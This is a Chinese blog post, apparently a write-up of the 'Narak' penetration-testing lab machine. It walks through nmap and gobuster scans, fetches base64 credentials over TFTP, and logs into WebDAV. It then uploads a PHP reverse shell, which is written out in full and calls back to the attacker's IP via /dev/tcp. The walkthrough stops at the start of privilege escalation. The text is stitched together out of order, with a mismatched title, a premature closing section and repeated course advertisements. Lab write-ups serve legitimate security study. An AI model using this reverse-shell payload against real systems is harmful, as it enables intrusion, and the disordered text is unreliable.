网络安全最新靶机渗透之narak,2024最值得加入的互联网公司有哪些

写在最后

在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。

需要完整版PDF学习资源私我

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

有SSH服务。后续可以实现远程登陆

目录扫描

漏洞扫描

总结一下扫描结果:

扫描结果显示了开放的端口以及相关的服务。

端口22/tcp是开放的,表示SSH服务在该端口上运行。

端口80/tcp也是开放的,表示HTTP服务在该端口上运行。

此外,扫描还提供了一些有关HTTP服务的信息:

_http-stored-xss: 未发现存储型XSS漏洞。

_http-internal-ip-disclosure: 发现了内部IP泄露,IP地址为127.0.1.1。

_http-dombased-xss: 未发现基于DOM的XSS漏洞。

_http-csrf: 发现了一些可能存在CSRF(跨站请求伪造)漏洞的路径和表单信息。其中,路径为http://192.168.11.163:80/,表单action为images/666.jpg。

_http-enum: 扫描发现了一些可能有趣的目录和文件,如/images/(具有Apache/2.4.29 (Ubuntu)服务器的目录列表)和/webdav/(需要身份验证的目录)

漏洞分析

打开登陆页面:192.168.11.163

没有什么发现。再登陆一下刚刚扫描的目录

需要用户名及密码,现在目标就是寻找websav目录的凭据了。我们信息收集仅仅爆破了目录,其中文件没有爆破。接下来我们爆破一下文件,看看能否发现什么关键线索。这里我们使用gobuser工具。-w后跟词表的路径。-x参数后添加一些后缀名,包含可能的文件,比如rar/zip/txt/php等。-u后跟靶机ip地址。

其中有index.html和tips.txt请求已经成功。其中index.html就是初始页面,所以我们就来看一下tips.txt。那么用kali使用curl访问一下

提示我们通往narak的门的线索可以在creds.txt找到,但是creds.txt在哪里呢?难道也是在web目录可以直接访问的吗?但是我们已经看了爆破出来的目录和文件,这个又在哪里呢?是不是在信息收集部分中漏掉了什么重要信息呢?莫非是nmap端口扫描的结果有误或者遗漏了什么?比如有可能遗漏了某些开放的UDP端口。

先来探测一些比较常见的UDP端口是否开放。其中"–top-ports 20":这个选项指定只扫描前20个常用端口。

发现了tftp端口69开放,这是一个简单文件传输协议,用于在计算机网络中进行文件传输。与FTP协议不同的是,TFTP传输文件时不需要用户进行登录。它只能从文件服务器上下载或上传文件,不能列出目录。用来在客户机与服务器之间进行简单文件传输的协议,提供不复杂、开销不大的文件传输服务。

那我们试试使用tftp协议,从靶机下载creds.txt。

漏洞利用

直接用tftp后接靶机地址即可连接靶机,

使用get creds.txt这个命令将他下载下来,我们输入quit退出tftp,然后查看这个creds.txt,貌似是个base64编码,我们解码一下

成功拿到了用户名及密码。这也可能是webdav目录的访问凭据!

回到webdav页面:输入用户名yamdoot,密码Swarg,可以进入到如下的页面

进来之后可以看到WebDAV,WebDAV 基于 HTTP 协议的通信协议,允许客户端发布、锁定和管理 Web 上的资源,那么我们现在就是企图获取webdav的权限,据此拿到初始shell。

davtest是一个文件上传漏洞的检测和验证工具,而cadaver作为一个命令行形式的WEBDAV客户端程序,可以对相应服务器进行任何操作

此时kali中有许多工具可以充当webdav的客户端,其中有一个工具davtest,可以测试通过webdav能上传哪些后缀文件以及其对应权限,可以看到上传的文件类型如下:

基本上都可以上传,再看一下执行权限:

发现是可以执行php文件的,因此我们可以尝试上传php类型的反弹shell,先编写一个shell.php,这里ip写的是kali的。

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.11.128/1234 0>&1'"); ?>

然后再利用一个客户端。把shell.php上传,此处使用的webdav客户端是cadaver:

回到浏览器,可以看到我们上传的shell,那个DavTestDir_是我们刚刚用testdav工具尝试上传的目录:

此时我们开启nc监听1234端口,然后访问shell.php,即可触发反弹shell

提权

先用sudo -l查看有什么可以利用的二进制文件

我们需要寻找有没有一些ssh登录的凭据或是可以利用的提权文件,最终通过查找可写的文件发现了一些端倪:

发现了一个可编辑的bash脚本hell.sh,还有一个users.password,除此之外还有一些update-motd.d下的文件,先来查看这个user.password,如下:

一、网安学习成长路线图

网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。
在这里插入图片描述

二、网安视频合集

观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。
在这里插入图片描述

三、精品网安学习书籍

当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。
在这里插入图片描述

四、网络安全源码合集+工具包

光学理论是没用的,要学会跟着一起敲,要动手实操,才能将自己的所学运用到实际当中去,这时候可以搞点实战案例来学习。
在这里插入图片描述

五、网络安全面试题

最后就是大家最关心的网络安全面试题板块
在这里插入图片描述在这里插入图片描述

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

  • 5
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值